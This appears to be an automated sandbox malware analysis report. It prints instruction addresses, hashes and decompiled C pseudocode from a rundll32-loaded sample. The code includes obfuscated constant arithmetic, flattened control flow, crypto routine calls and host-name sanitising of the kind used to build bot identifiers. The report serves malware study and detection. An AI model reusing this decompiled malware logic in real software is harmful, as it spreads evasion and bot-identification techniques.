                                                                                                                      0x0017248e
                                                                                                                      0x00172492
                                                                                                                      0x0017249a
                                                                                                                      0x001724a2
                                                                                                                      0x001724ae
                                                                                                                      0x001724b3
                                                                                                                      0x001724b9
                                                                                                                      0x001724be
                                                                                                                      0x001724c6
                                                                                                                      0x001724d2
                                                                                                                      0x001724d5
                                                                                                                      0x001724dc
                                                                                                                      0x001724e0
                                                                                                                      0x001724e5
                                                                                                                      0x001724ed
                                                                                                                      0x001724f5
                                                                                                                      0x001724ff
                                                                                                                      0x00172508
                                                                                                                      0x0017250c
                                                                                                                      0x00172514
                                                                                                                      0x0017251c
                                                                                                                      0x00172526
                                                                                                                      0x0017252a
                                                                                                                      0x00172532
                                                                                                                      0x0017253a
                                                                                                                      0x0017253f
                                                                                                                      0x00172547
                                                                                                                      0x00172547
                                                                                                                      0x0017254f
                                                                                                                      0x0017254f
                                                                                                                      0x0017254f
                                                                                                                      0x0017254f
                                                                                                                      0x00172555
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0017255b
                                                                                                                      0x0017262b
                                                                                                                      0x00172644
                                                                                                                      0x00172653
                                                                                                                      0x0017266c
                                                                                                                      0x00172671
                                                                                                                      0x0017267d
                                                                                                                      0x00172681
                                                                                                                      0x00172689
                                                                                                                      0x0017268a
                                                                                                                      0x0017268f
                                                                                                                      0x00172692
                                                                                                                      0x00172695
                                                                                                                      0x00172699
                                                                                                                      0x001726ac
                                                                                                                      0x001726bb
                                                                                                                      0x001726c2
                                                                                                                      0x001726c7
                                                                                                                      0x001726cb
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0017269b
                                                                                                                      0x0017269b
                                                                                                                      0x001726a2
                                                                                                                      0x001726a4
                                                                                                                      0x001726a4
                                                                                                                      0x001726a7
                                                                                                                      0x001726a8
                                                                                                                      0x00000000
                                                                                                                      0x0017269b
                                                                                                                      0x00172567
                                                                                                                      0x00172621
                                                                                                                      0x00000000
                                                                                                                      0x00172621
                                                                                                                      0x00172573
                                                                                                                      0x00172603
                                                                                                                      0x0017260e
                                                                                                                      0x00172616
                                                                                                                      0x00000000
                                                                                                                      0x00172616
                                                                                                                      0x0017257b
                                                                                                                      0x001725d9
                                                                                                                      0x001725de
                                                                                                                      0x001725e1
                                                                                                                      0x00000000
                                                                                                                      0x001725e1
                                                                                                                      0x00172583
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x001725a1
                                                                                                                      0x001725b5
                                                                                                                      0x001725ba
                                                                                                                      0x001725ba
                                                                                                                      0x001726dd
                                                                                                                      0x0017280a
                                                                                                                      0x0017280f
                                                                                                                      0x00172812
                                                                                                                      0x00000000
                                                                                                                      0x00172812
                                                                                                                      0x001726e9
                                                                                                                      0x001727c3
                                                                                                                      0x001727c4
                                                                                                                      0x001727c8
                                                                                                                      0x001727cd
                                                                                                                      0x001727d3
                                                                                                                      0x001727e9
                                                                                                                      0x001727d5
                                                                                                                      0x001727d7
                                                                                                                      0x001727dc
                                                                                                                      0x001727dd
                                                                                                                      0x001727dd
                                                                                                                      0x00000000
                                                                                                                      0x001727d3
                                                                                                                      0x001726f5
                                                                                                                      0x00172757
                                                                                                                      0x00172773
                                                                                                                      0x0017277e
                                                                                                                      0x00172787
                                                                                                                      0x00172791
                                                                                                                      0x00172798
                                                                                                                      0x0017279d
                                                                                                                      0x001727a2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x001727a4
                                                                                                                      0x00000000
                                                                                                                      0x001727a4
                                                                                                                      0x001726fd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00172703
                                                                                                                      0x00172727
                                                                                                                      0x0017272c
                                                                                                                      0x00172731
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00172737
                                                                                                                      0x00000000
                                                                                                                      0x00172817
                                                                                                                      0x00172817
                                                                                                                      0x0017282f

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $+E,$f,$E
                                                                                                                      • API String ID: 0-1056989491
                                                                                                                      • Opcode ID: f924d05836e70ef0a09e8ac1d4695ea004385d1c302f03348df483147d80d69e
                                                                                                                      • Instruction ID: 32ccebc9dcd7c96e2b6efd26274e6553c4be1a93de4061e9cc5f1e587d001e0a
                                                                                                                      • Opcode Fuzzy Hash: f924d05836e70ef0a09e8ac1d4695ea004385d1c302f03348df483147d80d69e
                                                                                                                      • Instruction Fuzzy Hash: 652210715083809FD368CF25C58AA9BFBF1FBD5708F10891DE6998A260D7B19949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0018CC89 Relevance: 5.3, Strings: 4, Instructions: 287COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0018CC89(intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				void* __ecx;
				void* _t283;
				intOrPtr _t315;
				void* _t316;
				intOrPtr _t320;
				intOrPtr _t324;
				void* _t325;
				intOrPtr* _t328;
				void* _t330;
				void* _t365;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				signed int _t374;
				signed int _t375;
				signed int _t376;
				signed int _t377;
				signed int _t378;
				signed int* _t381;

				_t367 = _a4;
				_t328 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0017CF25(_t283);
				_v60 = 0x688185;
				_t381 =  &(( &_v116)[4]);
				_v60 = _v60 ^ 0x6a5ee641;
				_t6 =  &_v60; // 0x6a5ee641
				_t365 = 0;
				_t330 = 0xb7d839b;
				_t368 = 0x77;
				_v60 =  *_t6 * 0x53;
				_v60 = _v60 ^ 0x6fa3a48d;
				_v36 = 0x2ce9a9;
				_v36 = _v36 / _t368;
				_v36 = _v36 ^ 0x0000609f;
				_v72 = 0x8d05d4;
				_v72 = _v72 + 0xfffff9ae;
				_v72 = _v72 + 0xfffffb99;
				_v72 = _v72 + 0xffff1821;
				_v72 = _v72 ^ 0x008c133c;
				_v84 = 0xdf93a7;
				_v84 = _v84 + 0x158a;
				_v84 = _v84 | 0xa6edaf65;
				_v84 = _v84 ^ 0xa6ffaf75;
				_v16 = 0x181fb2;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 ^ 0x00000303;
				_v40 = 0xf7fe46;
				_v40 = _v40 >> 4;
				_v40 = _v40 ^ 0x000f7fe4;
				_v96 = 0x7307ab;
				_v96 = _v96 + 0xffff98a0;
				_v96 = _v96 ^ 0x207b23a6;
				_t369 = 7;
				_v96 = _v96 / _t369;
				_v96 = _v96 ^ 0x0493a521;
				_v68 = 0xb0f7c2;
				_v68 = _v68 + 0xa001;
				_v68 = _v68 + 0xf927;
				_t370 = 0x1b;
				_v68 = _v68 / _t370;
				_v68 = _v68 ^ 0x0001298b;
				_v20 = 0x9a8fe8;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x0008eae3;
				_v76 = 0xc447f;
				_v76 = _v76 << 2;
				_v76 = _v76 ^ 0x6da7c905;
				_v76 = _v76 | 0x8e440162;
				_v76 = _v76 ^ 0xefde5c32;
				_v80 = 0xe5293a;
				_v80 = _v80 ^ 0x7ea2fbd4;
				_v80 = _v80 << 6;
				_v80 = _v80 >> 0x10;
				_v80 = _v80 ^ 0x000bb464;
				_v24 = 0xaea513;
				_v24 = _v24 ^ 0xb7e1a43c;
				_v24 = _v24 ^ 0xb74b462d;
				_v28 = 0x6b2191;
				_v28 = _v28 | 0x9c0eb3e2;
				_v28 = _v28 ^ 0x9c639c10;
				_v32 = 0x4e8823;
				_t371 = 0xe;
				_v32 = _v32 / _t371;
				_v32 = _v32 ^ 0x000823cf;
				_v88 = 0x8b37c7;
				_v88 = _v88 + 0x96e4;
				_t372 = 0x63;
				_v88 = _v88 / _t372;
				_t373 = 0x18;
				_v88 = _v88 / _t373;
				_v88 = _v88 ^ 0x000cd8d0;
				_v92 = 0x8ccaf;
				_v92 = _v92 + 0xffff7c77;
				_v92 = _v92 >> 7;
				_t374 = 0x1a;
				_v92 = _v92 * 0x4a;
				_v92 = _v92 ^ 0x000ee576;
				_v100 = 0x6d8220;
				_v100 = _v100 + 0xffffba59;
				_v100 = _v100 / _t374;
				_v100 = _v100 + 0x20d5;
				_v100 = _v100 ^ 0x000e9a10;
				_v104 = 0xccaba6;
				_t375 = 0x29;
				_v104 = _v104 / _t375;
				_t376 = 0x69;
				_v104 = _v104 / _t376;
				_v104 = _v104 + 0xffff1a57;
				_v104 = _v104 ^ 0xfff2229f;
				_v44 = 0x73a08b;
				_v44 = _v44 / _t376;
				_v44 = _v44 ^ 0x0004e5c5;
				_v108 = 0xb1e3bd;
				_v108 = _v108 ^ 0x0f8130c9;
				_v108 = _v108 + 0x5ac4;
				_t377 = 0x21;
				_v108 = _v108 / _t377;
				_v108 = _v108 ^ 0x0077ef5a;
				_v112 = 0x4cec76;
				_t192 =  &_v112; // 0x4cec76
				_v112 =  *_t192 * 0x1a;
				_v112 = _v112 + 0xdd93;
				_v112 = _v112 << 6;
				_v112 = _v112 ^ 0xf432eb29;
				_v116 = 0x879801;
				_v116 = _v116 + 0x9229;
				_v116 = _v116 << 3;
				_v116 = _v116 | 0xee96daec;
				_v116 = _v116 ^ 0xeed13984;
				_v64 = 0x9b79ce;
				_v64 = _v64 >> 0xe;
				_t378 = 0x5f;
				_v64 = _v64 * 0x1e;
				_v64 = _v64 | 0xf7dc9e8a;
				_v64 = _v64 ^ 0xf7d2a70d;
				_v48 = 0x898fb;
				_v48 = _v48 << 0xa;
				_v48 = _v48 * 0x4f;
				_v48 = _v48 ^ 0x9cd9bf24;
				_v52 = 0xd43737;
				_v52 = _v52 << 9;
				_v52 = _v52 / _t378;
				_v52 = _v52 ^ 0x01c68cd1;
				_v56 = 0x1c405f;
				_v56 = _v56 >> 0xa;
				_v56 = _v56 | 0xb1ef7bec;
				_v56 = _v56 ^ 0xb1edddf2;
				do {
					while(_t330 != 0x6ea4fc1) {
						if(_t330 == 0x7f0f713) {
							_push(_t330);
							_push(_t330);
							_t320 = E00183512(_v8);
							_v12 = _t320;
							if(_t320 != 0) {
								_t330 = 0xa80f622;
								continue;
							}
						} else {
							if(_t330 == 0x7f61550) {
								E001768DE(_v64, _v48, _v52, _v56, _v12);
							} else {
								if(_t330 == 0xa80f622) {
									_t324 =  *0x195c9c; // 0x0
									_t325 = E0017B335(_v100,  *_t367, _v104,  *((intOrPtr*)(_t324 + 0x50)), _v36, _t330, _v40,  &_v8, _v44,  *((intOrPtr*)(_t367 + 4)), _v108, _v112, _v12, _v116, _t330, _v8);
									_t381 =  &(_t381[0xe]);
									if(_t325 == _v96) {
										 *_t328 = _v12;
										_t365 = 1;
										 *((intOrPtr*)(_t328 + 4)) = _v8;
									} else {
										_t330 = 0x7f61550;
										continue;
									}
								} else {
									if(_t330 != 0xb7d839b) {
										goto L14;
									} else {
										_t330 = 0x6ea4fc1;
										continue;
									}
								}
							}
						}
						L18:
						return _t365;
					}
					_t315 =  *0x195c9c; // 0x0
					_t316 = E0017B335(_v68,  *_t367, _v20,  *((intOrPtr*)(_t315 + 0x50)), _v60, _t330, _v72,  &_v8, _v76,  *((intOrPtr*)(_t367 + 4)), _v80, _v24, _t365, _v28, _t330, _v84);
					_t381 =  &(_t381[0xe]);
					if(_t316 != _v16) {
						_t330 = 0x33d9eeb;
						goto L14;
					} else {
						_t330 = 0x7f0f713;
						continue;
					}
					goto L18;
					L14:
				} while (_t330 != 0x33d9eeb);
				goto L18;
			}





















































                                                                                                                      0x0018cc8f
                                                                                                                      0x0018cc96
                                                                                                                      0x0018cc99
                                                                                                                      0x0018cca0
                                                                                                                      0x0018cca1
                                                                                                                      0x0018cca3
                                                                                                                      0x0018cca8
                                                                                                                      0x0018ccb0
                                                                                                                      0x0018ccb3
                                                                                                                      0x0018ccbd
                                                                                                                      0x0018ccc2
                                                                                                                      0x0018ccc4
                                                                                                                      0x0018cccb
                                                                                                                      0x0018ccce
                                                                                                                      0x0018ccd2
                                                                                                                      0x0018ccda
                                                                                                                      0x0018ccea
                                                                                                                      0x0018ccee
                                                                                                                      0x0018ccf6
                                                                                                                      0x0018ccfe
                                                                                                                      0x0018cd06
                                                                                                                      0x0018cd0e
                                                                                                                      0x0018cd16
                                                                                                                      0x0018cd1e
                                                                                                                      0x0018cd26
                                                                                                                      0x0018cd2e
                                                                                                                      0x0018cd36
                                                                                                                      0x0018cd3e
                                                                                                                      0x0018cd46
                                                                                                                      0x0018cd4b
                                                                                                                      0x0018cd53
                                                                                                                      0x0018cd5b
                                                                                                                      0x0018cd60
                                                                                                                      0x0018cd68
                                                                                                                      0x0018cd70
                                                                                                                      0x0018cd78
                                                                                                                      0x0018cd84
                                                                                                                      0x0018cd89
                                                                                                                      0x0018cd8f
                                                                                                                      0x0018cd97
                                                                                                                      0x0018cd9f
                                                                                                                      0x0018cda7
                                                                                                                      0x0018cdb3
                                                                                                                      0x0018cdb6
                                                                                                                      0x0018cdba
                                                                                                                      0x0018cdc2
                                                                                                                      0x0018cdca
                                                                                                                      0x0018cdcf
                                                                                                                      0x0018cdd7
                                                                                                                      0x0018cddf
                                                                                                                      0x0018cde4
                                                                                                                      0x0018cdec
                                                                                                                      0x0018cdf4
                                                                                                                      0x0018cdfc
                                                                                                                      0x0018ce04
                                                                                                                      0x0018ce0c
                                                                                                                      0x0018ce11
                                                                                                                      0x0018ce16
                                                                                                                      0x0018ce1e
                                                                                                                      0x0018ce26
                                                                                                                      0x0018ce2e
                                                                                                                      0x0018ce36
                                                                                                                      0x0018ce3e
                                                                                                                      0x0018ce46
                                                                                                                      0x0018ce4e
                                                                                                                      0x0018ce5e
                                                                                                                      0x0018ce63
                                                                                                                      0x0018ce67
                                                                                                                      0x0018ce6f
                                                                                                                      0x0018ce77
                                                                                                                      0x0018ce85
                                                                                                                      0x0018ce8a
                                                                                                                      0x0018ce94
                                                                                                                      0x0018ce99
                                                                                                                      0x0018ce9d
                                                                                                                      0x0018cea5
                                                                                                                      0x0018cead
                                                                                                                      0x0018ceb5
                                                                                                                      0x0018cec1
                                                                                                                      0x0018cec4
                                                                                                                      0x0018cec8
                                                                                                                      0x0018ced0
                                                                                                                      0x0018ced8
                                                                                                                      0x0018cee8
                                                                                                                      0x0018ceec
                                                                                                                      0x0018cef4
                                                                                                                      0x0018cefc
                                                                                                                      0x0018cf08
                                                                                                                      0x0018cf0d
                                                                                                                      0x0018cf17
                                                                                                                      0x0018cf1c
                                                                                                                      0x0018cf20
                                                                                                                      0x0018cf28
                                                                                                                      0x0018cf30
                                                                                                                      0x0018cf40
                                                                                                                      0x0018cf46
                                                                                                                      0x0018cf4e
                                                                                                                      0x0018cf56
                                                                                                                      0x0018cf5e
                                                                                                                      0x0018cf6a
                                                                                                                      0x0018cf6d
                                                                                                                      0x0018cf71
                                                                                                                      0x0018cf79
                                                                                                                      0x0018cf81
                                                                                                                      0x0018cf86
                                                                                                                      0x0018cf8a
                                                                                                                      0x0018cf92
                                                                                                                      0x0018cf97
                                                                                                                      0x0018cf9f
                                                                                                                      0x0018cfa7
                                                                                                                      0x0018cfaf
                                                                                                                      0x0018cfb4
                                                                                                                      0x0018cfbc
                                                                                                                      0x0018cfc4
                                                                                                                      0x0018cfce
                                                                                                                      0x0018cfda
                                                                                                                      0x0018cfdb
                                                                                                                      0x0018cfdf
                                                                                                                      0x0018cfe7
                                                                                                                      0x0018cfef
                                                                                                                      0x0018cff7
                                                                                                                      0x0018d001
                                                                                                                      0x0018d005
                                                                                                                      0x0018d00d
                                                                                                                      0x0018d015
                                                                                                                      0x0018d025
                                                                                                                      0x0018d029
                                                                                                                      0x0018d031
                                                                                                                      0x0018d039
                                                                                                                      0x0018d03e
                                                                                                                      0x0018d046
                                                                                                                      0x0018d04e
                                                                                                                      0x0018d04e
                                                                                                                      0x0018d05c
                                                                                                                      0x0018d0f6
                                                                                                                      0x0018d0f7
                                                                                                                      0x0018d0ff
                                                                                                                      0x0018d104
                                                                                                                      0x0018d10f
                                                                                                                      0x0018d115
                                                                                                                      0x00000000
                                                                                                                      0x0018d115
                                                                                                                      0x0018d062
                                                                                                                      0x0018d068
                                                                                                                      0x0018d1af
                                                                                                                      0x0018d06e
                                                                                                                      0x0018d074
                                                                                                                      0x0018d0bc
                                                                                                                      0x0018d0ce
                                                                                                                      0x0018d0d3
                                                                                                                      0x0018d0da
                                                                                                                      0x0018d18f
                                                                                                                      0x0018d191
                                                                                                                      0x0018d196
                                                                                                                      0x0018d0e0
                                                                                                                      0x0018d0e0
                                                                                                                      0x00000000
                                                                                                                      0x0018d0e0
                                                                                                                      0x0018d076
                                                                                                                      0x0018d07c
                                                                                                                      0x00000000
                                                                                                                      0x0018d082
                                                                                                                      0x0018d082
                                                                                                                      0x00000000
                                                                                                                      0x0018d082
                                                                                                                      0x0018d07c
                                                                                                                      0x0018d074
                                                                                                                      0x0018d068
                                                                                                                      0x0018d1b7
                                                                                                                      0x0018d1c0
                                                                                                                      0x0018d1c0
                                                                                                                      0x0018d149
                                                                                                                      0x0018d15e
                                                                                                                      0x0018d163
                                                                                                                      0x0018d16a
                                                                                                                      0x0018d176
                                                                                                                      0x00000000
                                                                                                                      0x0018d16c
                                                                                                                      0x0018d16c
                                                                                                                      0x00000000
                                                                                                                      0x0018d16c
                                                                                                                      0x00000000
                                                                                                                      0x0018d17b
                                                                                                                      0x0018d17b
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: :)$A^j$Zw$vL
                                                                                                                      • API String ID: 0-3297297485
                                                                                                                      • Opcode ID: 24cfc3d01645b0720ccf1c3eb751546217551c5519edba5b0b30b6e4f529f1db
                                                                                                                      • Instruction ID: ebe9543afd2d6bc4402c79385e4c982936ee3470b2d849d4c8f647c29c7f07ce
                                                                                                                      • Opcode Fuzzy Hash: 24cfc3d01645b0720ccf1c3eb751546217551c5519edba5b0b30b6e4f529f1db
                                                                                                                      • Instruction Fuzzy Hash: 59D130B25083419FD768CF66D98991BFBE2FBC4748F10891DF295862A0C7B69949CF03
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0018A156 Relevance: 5.2, Strings: 4, Instructions: 170COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E0018A156(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v128;
				signed int _v132;
				intOrPtr _v136;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				void* _t133;
				signed int _t146;
				void* _t147;
				void* _t155;
				char* _t156;
				void* _t174;
				signed int _t175;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed int* _t183;

				_push(_a12);
				_t174 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0017CF25(_t133);
				_v132 = _v132 & 0x00000000;
				_t183 =  &(( &_v196)[5]);
				_v136 = 0x446ea7;
				_v180 = 0x28766d;
				_t155 = 0x8ee0430;
				_v180 = _v180 | 0x8061b26e;
				_t175 = 0x7a;
				_v180 = _v180 / _t175;
				_v180 = _v180 ^ 0x0107c2a1;
				_v160 = 0x181348;
				_t176 = 0x24;
				_v160 = _v160 / _t176;
				_v160 = _v160 ^ 0x00002248;
				_v192 = 0xf13979;
				_v192 = _v192 + 0xffff8439;
				_v192 = _v192 << 0xb;
				_v192 = _v192 + 0x337f;
				_v192 = _v192 ^ 0x85ec5d3f;
				_v148 = 0x5e6289;
				_v148 = _v148 >> 5;
				_v148 = _v148 ^ 0x00022a63;
				_v184 = 0xe3b806;
				_v184 = _v184 + 0xc2d8;
				_v184 = _v184 | 0x759fad77;
				_v184 = _v184 ^ 0x75f287c1;
				_v168 = 0x566c5d;
				_v168 = _v168 ^ 0x750ff463;
				_v168 = _v168 ^ 0x75584e2a;
				_v152 = 0x83e247;
				_v152 = _v152 ^ 0x81f90c1d;
				_v152 = _v152 ^ 0x81706586;
				_v188 = 0x5c5a6b;
				_v188 = _v188 >> 9;
				_v188 = _v188 << 0xb;
				_v188 = _v188 >> 0xf;
				_v188 = _v188 ^ 0x00030e37;
				_v176 = 0xc154a1;
				_v176 = _v176 | 0xc3f8b8be;
				_t177 = 0x3c;
				_v176 = _v176 * 0x16;
				_v176 = _v176 ^ 0xd77414a9;
				_v164 = 0x5dd26c;
				_v164 = _v164 * 0x18;
				_v164 = _v164 ^ 0x08c2b6d4;
				_v144 = 0x980588;
				_v144 = _v144 << 3;
				_v144 = _v144 ^ 0x04c0143e;
				_v196 = 0xd24b78;
				_v196 = _v196 * 0xf;
				_v196 = _v196 * 7;
				_v196 = _v196 / _t177;
				_v196 = _v196 ^ 0x017222e8;
				_v156 = 0x8c94fd;
				_v156 = _v156 + 0xffff8671;
				_v156 = _v156 ^ 0x0082913e;
				_v172 = 0x17d6e;
				_t178 = 0x63;
				_t146 = _v172 / _t178;
				_v172 = _t146;
				_v172 = _v172 + 0x20ae;
				_v172 = _v172 ^ 0x00044ed7;
				do {
					while(_t155 != 0x2e9bf4f) {
						if(_t155 == 0x570f58c) {
							_push(0x171494);
							_push(_v168);
							_t147 = E0017BB4B(_v148, _v184, __eflags);
							E0018D1C1(__eflags, _t174, _v188, _v176, _t147, E0017F154(__eflags), _v164, _v144);
							return E0017AE03(_v196, _v156, _v172, _t147);
						}
						if(_t155 == 0x8ee0430) {
							_t155 = 0xffbee7a;
							continue;
						}
						if(_t155 != 0xffbee7a) {
							goto L17;
						}
						_v140 = 0x80;
						_t146 = E00183F73(_v180, _v160,  &_v140, _v192,  &_v128);
						_t183 =  &(_t183[3]);
						_t155 = 0x2e9bf4f;
					}
					__eflags = _v128;
					_t156 =  &_v128;
					if(_v128 == 0) {
						L16:
						_t155 = 0x570f58c;
						goto L17;
					} else {
						goto L8;
					}
					do {
						L8:
						_t146 =  *_t156;
						__eflags = _t146 - 0x30;
						if(_t146 < 0x30) {
							L10:
							__eflags = _t146 - 0x61;
							if(_t146 < 0x61) {
								L12:
								__eflags = _t146 - 0x41;
								if(_t146 < 0x41) {
									L14:
									 *_t156 = 0x58;
									goto L15;
								}
								__eflags = _t146 - 0x5a;
								if(_t146 <= 0x5a) {
									goto L15;
								}
								goto L14;
							}
							__eflags = _t146 - 0x7a;
							if(_t146 <= 0x7a) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t146 - 0x39;
						if(_t146 <= 0x39) {
							goto L15;
						}
						goto L10;
						L15:
						_t156 = _t156 + 1;
						__eflags =  *_t156;
					} while ( *_t156 != 0);
					goto L16;
					L17:
					__eflags = _t155 - 0x55e4d43;
				} while (__eflags != 0);
				return _t146;
			}
































                                                                                                                      0x0018a160
                                                                                                                      0x0018a167
                                                                                                                      0x0018a169
                                                                                                                      0x0018a170
                                                                                                                      0x0018a177
                                                                                                                      0x0018a178
                                                                                                                      0x0018a179
                                                                                                                      0x0018a17e
                                                                                                                      0x0018a183
                                                                                                                      0x0018a186
                                                                                                                      0x0018a190
                                                                                                                      0x0018a198
                                                                                                                      0x0018a19d
                                                                                                                      0x0018a1ab
                                                                                                                      0x0018a1b0
                                                                                                                      0x0018a1b6
                                                                                                                      0x0018a1be
                                                                                                                      0x0018a1ca
                                                                                                                      0x0018a1cf
                                                                                                                      0x0018a1d5
                                                                                                                      0x0018a1dd
                                                                                                                      0x0018a1e5
                                                                                                                      0x0018a1ed
                                                                                                                      0x0018a1f2
                                                                                                                      0x0018a1fa
                                                                                                                      0x0018a202
                                                                                                                      0x0018a20a
                                                                                                                      0x0018a20f
                                                                                                                      0x0018a217
                                                                                                                      0x0018a21f
                                                                                                                      0x0018a227
                                                                                                                      0x0018a22f
                                                                                                                      0x0018a237
                                                                                                                      0x0018a23f
                                                                                                                      0x0018a247
                                                                                                                      0x0018a24f
                                                                                                                      0x0018a257
                                                                                                                      0x0018a25f
                                                                                                                      0x0018a267
                                                                                                                      0x0018a26f
                                                                                                                      0x0018a274
                                                                                                                      0x0018a279
                                                                                                                      0x0018a27e
                                                                                                                      0x0018a286
                                                                                                                      0x0018a28e
                                                                                                                      0x0018a29b
                                                                                                                      0x0018a29c
                                                                                                                      0x0018a2a0
                                                                                                                      0x0018a2a8
                                                                                                                      0x0018a2b5
                                                                                                                      0x0018a2b9
                                                                                                                      0x0018a2c1
                                                                                                                      0x0018a2c9
                                                                                                                      0x0018a2ce
                                                                                                                      0x0018a2d6
                                                                                                                      0x0018a2e3
                                                                                                                      0x0018a2ec
                                                                                                                      0x0018a2f6
                                                                                                                      0x0018a2fa
                                                                                                                      0x0018a302
                                                                                                                      0x0018a30a
                                                                                                                      0x0018a312
                                                                                                                      0x0018a31c
                                                                                                                      0x0018a334
                                                                                                                      0x0018a335
                                                                                                                      0x0018a33c
                                                                                                                      0x0018a340
                                                                                                                      0x0018a348
                                                                                                                      0x0018a350
                                                                                                                      0x0018a350
                                                                                                                      0x0018a356
                                                                                                                      0x0018a3cc
                                                                                                                      0x0018a3d1
                                                                                                                      0x0018a3dd
                                                                                                                      0x0018a404
                                                                                                                      0x00000000
                                                                                                                      0x0018a41b
                                                                                                                      0x0018a35e
                                                                                                                      0x0018a38e
                                                                                                                      0x00000000
                                                                                                                      0x0018a38e
                                                                                                                      0x0018a362
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018a368
                                                                                                                      0x0018a382
                                                                                                                      0x0018a387
                                                                                                                      0x0018a38a
                                                                                                                      0x0018a38a
                                                                                                                      0x0018a392
                                                                                                                      0x0018a397
                                                                                                                      0x0018a39b
                                                                                                                      0x0018a3c0
                                                                                                                      0x0018a3c0
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018a39d
                                                                                                                      0x0018a39d
                                                                                                                      0x0018a39d
                                                                                                                      0x0018a39f
                                                                                                                      0x0018a3a1
                                                                                                                      0x0018a3a7
                                                                                                                      0x0018a3a7
                                                                                                                      0x0018a3a9
                                                                                                                      0x0018a3af
                                                                                                                      0x0018a3af
                                                                                                                      0x0018a3b1
                                                                                                                      0x0018a3b7
                                                                                                                      0x0018a3b7
                                                                                                                      0x00000000
                                                                                                                      0x0018a3b7
                                                                                                                      0x0018a3b3
                                                                                                                      0x0018a3b5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018a3b5
                                                                                                                      0x0018a3ab
                                                                                                                      0x0018a3ad
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018a3ad
                                                                                                                      0x0018a3a3
                                                                                                                      0x0018a3a5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018a3ba
                                                                                                                      0x0018a3ba
                                                                                                                      0x0018a3bb
                                                                                                                      0x0018a3bb
                                                                                                                      0x00000000
                                                                                                                      0x0018a3c2
                                                                                                                      0x0018a3c2
                                                                                                                      0x0018a3c2
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
